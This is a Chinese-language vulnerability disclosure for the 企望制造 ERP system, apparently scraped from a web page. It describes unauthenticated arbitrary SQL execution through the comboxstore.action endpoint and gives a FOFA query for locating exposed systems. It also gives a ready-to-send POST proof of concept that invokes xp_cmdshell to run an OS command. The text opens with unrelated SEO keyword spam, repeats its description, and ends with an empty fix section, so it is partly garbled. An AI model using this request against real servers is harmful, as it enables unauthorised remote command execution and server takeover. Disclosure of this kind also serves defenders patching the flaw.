山东省建设监理协会网站6,上海网站seo诊断,wap网站和internet网站,指定关键词seo报价漏洞描述
由于企望制造 ERP comboxstore.action接口权限设置不当#xff0c;默认的配置可执行任意SQL语句#xff0c;利用xp_cmdshell函数可远程执行命令#xff0c;未经认证的攻击者可通过该漏洞获取服务器权限。
免责声明
技术文章仅供参考#xff0c;任何个人和组织…漏洞描述
由于企望制造 ERP comboxstore.action接口权限设置不当默认的配置可执行任意SQL语句利用xp_cmdshell函数可远程执行命令未经认证的攻击者可通过该漏洞获取服务器权限。
免责声明
技术文章仅供参考任何个人和组织使用网络应当遵守宪法法律遵守公共秩序尊重社会公德不得利用网络从事危害国家安全、荣誉和利益未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失均由使用者本人负责。本文所提供的工具仅用于学习禁止用于其他
资产确定
fofatitle企望制造ERP系统
漏洞复现
1.利用如下POC发起POST请求执行whoami命令得到回显 POST /mainFunctions/comboxstore.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56comboxsqlexec%20xp_cmdshell%20whoami修复方案